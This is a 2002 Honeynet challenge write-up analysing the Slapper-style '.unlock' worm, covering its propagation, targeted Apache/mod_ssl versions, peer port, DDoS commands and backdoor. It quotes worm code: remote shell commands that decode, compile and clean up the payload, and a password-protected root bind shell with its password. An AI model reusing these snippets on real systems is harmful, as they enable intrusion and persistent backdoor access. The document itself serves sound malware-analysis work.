Honeynet Challenge Scan of the Month, November, 2002

Ken Sallot
[email protected]
Analysis completed on 11/15/2002


Answers to Questions:

1. Which is the type of the .unlock file? When was it generated?

It is a gzipped tarball created on 9/20/2002 at 6:59:04.

file version 3.37 identified the original ".unlock" file as a gzipped file. After deflating the archive, file reported the resultant file was a tarball.

      [[email protected] orig]$ file .unlock 
      .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 \
      06:59:04 2002, os: Unix

      [[email protected] orig]$ gunzip -c .unlock > unlock.decompressed

      [[email protected] orig]$ file unlock.decompressed 
      unlock.decompressed: GNU tar archive
2. Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?

According to the source code, ".unlock.c" was originally written by "[email protected]", but modified by "[email protected]". In .unlock.c on line 71 there is a define for 'VERSION' which says the program was finished on September 20th, 2002:

#define VERSION 20092002

According to the source code, ".update.c" was written by "[email protected]".

Additionally, according to the stat utility, the files were last modified on 9/20/2002 and 9/19/2002 respectively:


      [[email protected] scan25]$ stat .unlock.c 
         File: ".unlock.c"
         Size: 70981           Blocks: 152        IO Block: 4096   Regular File
       Device: 303h/771d       Inode: 505693      Links: 1    
       Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (   10/   wheel)
       Access: Tue Nov 12 23:19:27 2002
       Modify: Fri Sep 20 09:28:11 2002
       Change: Tue Nov 12 23:19:27 2002

       [[email protected] scan25]$ stat .update.c 
         File: ".update.c"
         Size: 2792            Blocks: 8          IO Block: 4096   Regular File
       Device: 303h/771d       Inode: 505694      Links: 1    
       Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (   10/   wheel)
       Access: Tue Nov 12 23:19:27 2002
       Modify: Thu Sep 19 17:57:48 2002
       Change: Tue Nov 12 23:19:27 2002

The file dates are compatible with when I believe the original tarball was created from question #1.

3. Which process name is used by the worm when it is running?

The ".unlock" executable will show up as running the process name "httpd ". The ".update" remote root shell will show as running the process named "update ".

Line 78 in ".unlock.c" creates a define, PSNAME, and sets the value to httpd:

#define PSNAME "httpd "

Line 1805 in ".unlock.c" sets the "argv[0]" parameter to PSNAME. "argv[0]" is the process name displayed when producing a process list through tools such as "ps":

strcpy(argv[0],PSNAME);

Line 8 in ".update.c" sets a define, PSNAME, of update:

#define PSNAME "update " // what copy to argv[0]

Line 35 in ".update.c" sets the "argv[0]" parameter to PSNAME:

strcpy(argv[0],PSNAME);

4. In which format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, wich files remain on the infected machine?

The worm uuencodes itself and copies itself as a uuencoded file named "/tmp/.unlock.uu". This is done inside of the "sh" function beginning on line 1403 in ".unlock.c". The code creates the uuencoded file by calling "cat" on the attacked host, and then uuencoding the original ".unlock" tarball by calling the "encode" function (on line 1418).

Once the uuencoded worm is sent to the attacked host, it decrypts the file and creates the tarball, ".unlock". This is in line 1421 of the ".unlock.c" program.

By the time it is done, the worm creates the following files:

FileDescription
/tmp/.unlock.uuuuencoded payload sent to infected host
/tmp/.unlockGNU zipped tarball with source files
/tmp/.unlock.cworm source code
/tmp/httpdworm source code once it has been compiled
/tmp/.update.croot shell backdoor source code
/tmp/updatecompiled backdoor program

The sections of the source code which perform this task are between lines 1416 and 1424 in ".unlock.c":


      writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
      zhdr(1);  
      encode(sockfd);
      zhdr(0);
      writem(sockfd,"__eof__\n");
 
      writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
                "tar xzf /tmp/.unlock -C /tmp/;              "
		"gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
		"gcc -o /tmp/update /tmp/.update.c;\n");
 

The only file which remains on the infected system after the worm is running is "/tmp/.unlock". The rest of the files are removed from the infected system. This is done on lines 1427 and 1428 of the ".unlock.c" worm:


       writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
                "       /tmp/httpd /tmp/update; exit; \n");

5. Which port is scanned by the worm?

The worm scans port 80, the standard httpd port.

Line 67 of ".unlock.c" defines "SCANPORT" as port 80:

#define SCANPORT 80

The actual scanning is done in the main subroutine of the program, within the SCAN conditional define. On line 1923 of ".unlock.c" is where the worm attempts to connect to a potential victem host:

atcp_sync_connect(&clients[n],srv,SCANPORT);

6. Which vulnerability the worm tries to exploit? In which architectures?

The worm exploits a vulnerability in the SSL protocol on vulnerable web-servers. It is specifically targeted at various linux distributions running the Apache web-server with mod_ssl on port 443.

The attack routine is in the subroutine "exploit" beginning on line 1697 and ending on line 1761 inside of ".unlock.c".

The list of vulnerable distributions with their matching versions of the apache web-server are as follows:

ID #DistributionApache Version
1Gentooall (non-specified)
2Debian1.3.26
3Red-Hat1.3.6
4Red-Hat1.3.9
5Red-Hat1.3.12
6Red-Hat1.3.12 (another attack vector)
7Red-Hat1.3.19
8Red-Hat1.3.20
9Red-Hat1.3.26
10Red-Hat1.3.23
11Red-Hat1.3.22
12SuSE1.3.12
13SuSE1.3.17
14SuSE1.3.19
15SuSE1.3.20
16SuSE1.3.23
17SuSE1.3.23 (another attack vector)
18Mandrake1.3.14
19Mandrake1.3.19
20Mandrake1.3.20
21Mandrake1.3.23
22Slackware1.3.26
23Slackware1.3.26 (another attack vector)

This information was gathered from the "architectures" constant beginning on line 1245 and ending on line 1268 in ".unlock.c".

7. What kind of information is sent by the worm by email? To which account?

The following things are emailed by the worm:

The email is sent to [email protected].

The email is sent in the 'mailme' function beginning on line 94, and ending on line 130 in ".unlock.c".

The 'mailme' function is called with the value of argv[1], which would be the first element of the command line passed to the worm. This is done on line 1802 of ".unlock.c".

When the worm is started, it is passed the ip address of the attacking machine as a command line parameter. This is done on line 1425 of the worm, in the 'sh' function, within ".unlock.c":

sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip);

8. Which port (and protocol) is used by the worm to communicate to other infected machines?

The infected machines use UDP on port 4156 to communicate to each other.

The port is defined on line 66 of the ".unlock.c" source code and the worm listens on that port on line 1781, and communicates with other hosts on lines 932 and 948 of the ".unlock.c" source code.

9. Name 3 functionalities built in the worm to attack other networks. The worm listens for commands to be sent to it on port 4156/udp. It can be used to intitiate the following distributed denial of service attacks (DDoS). The information can be retrieved in the ".unlock.c" source code:

Command CodeAttack typeLine #'s in source
0x29udp flood a host2205-2245
0x2atcp flood a host2246-2277
0x2bIPv6 TCP flood a host ** ONLY if the "NOIPV6" define is not set **2279-2306
0x2cDNS flood a host2308-2385

10. What is the purpose of the .update.c program? Which port does it use?

".update.c" creates an interactive root shell if someone connects to port 1052/tcp and provides the password "aion1981".

The port is defined on line 4, the password is on line 5, in ".update.c".

The code to provide the interactive root shell is between lines 58 and 67 in ".update.c":


            if (!fork()) { 
                dup2(soc_cli,0); 
                dup2(soc_cli,1); 
                dup2(soc_cli,2);
   	        read(soc_cli,temp_buff,10);
	        if( !strncmp(temp_buff,PASS,strlen(PASS)) )
                  execl("/bin/sh","sh -i",(char *)0); 
                closeall(); 
                exit(0); 
            } else wait(&retval); 

11. Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

The ".update.c" program opens a socket on port 1052/tcp for 10 seconds once every 5 minutes. If a person connects to the host and provides the correct password (from #10 above) during this 10 second window, they will be given an interactive root shell. If no one connects during the 10 second listen window, the host will stop answering requests for 5 minutes at which point the cycle will begin again.

"UPTIME" is set to 10 seconds, which is the time period the host will listen for a connection on 1052/tcp. This is in the for loop beginning on line 52, and ending on line 70:


	for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
	{
	  soc_cli = accept(soc_des, 
	              (struct sockaddr *) &client_addr, sizeof(client_addr));
          if (soc_cli > 0) 
	  {
            if (!fork()) { 
                dup2(soc_cli,0); 
                dup2(soc_cli,1); 
                dup2(soc_cli,2);
   	        read(soc_cli,temp_buff,10);
	        if( !strncmp(temp_buff,PASS,strlen(PASS)) )
                  execl("/bin/sh","sh -i",(char *)0); 
                closeall(); 
                exit(0); 
            } else wait(&retval); 
	  }
	  sleep(1);
	}              

"SLEEPTIME" is set to 300 seconds, which is a 5 minute window in which the host is not accepting connections on 1052/tcp. This is done on line 73 of the program:

sleep(SLEEPTIME);


------ steps taken --------
[[email protected] scan25]$ md5sum .unlock 
a03b5be9264651ab30f2223592befb42  .unlock

[[email protected] scan25]$ file .unlock 
.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 06:59:04 2002, os: Unix

[[email protected] scan25]$ tar tfvz .unlock
-rw-r--r-- root/wheel    70981 2002-09-20 09:28:11 .unlock.c
-rw-r--r-- root/wheel     2792 2002-09-19 17:57:48 .update.c

[[email protected] scan25]$ su
Password: 

[[email protected] scan25]# tar xfv .unlock --atime-preserve --same-owner -p
.unlock.c
.update.c

[[email protected] scan25]# exit

[[email protected] scan25]$ stat .unlock.c 
  File: ".unlock.c"
  Size: 70981           Blocks: 152        IO Block: 4096   Regular File
Device: 303h/771d       Inode: 505693      Links: 1    
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (   10/   wheel)
Access: Tue Nov 12 23:19:27 2002
Modify: Fri Sep 20 09:28:11 2002
Change: Tue Nov 12 23:19:27 2002

[[email protected] scan25]$ stat .update.c 
  File: ".update.c"
  Size: 2792            Blocks: 8          IO Block: 4096   Regular File
Device: 303h/771d       Inode: 505694      Links: 1    
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (   10/   wheel)
Access: Tue Nov 12 23:19:27 2002
Modify: Thu Sep 19 17:57:48 2002
Change: Tue Nov 12 23:19:27 2002

[[email protected] scan25]$ md5sum .unlock.c 
08fd6e79eb5729c2c9f08e4aedba469c  .unlock.c

[[email protected] scan25]$ md5sum .update.c 
9e299c76295b4a654e544bed35adb9f3  .update.c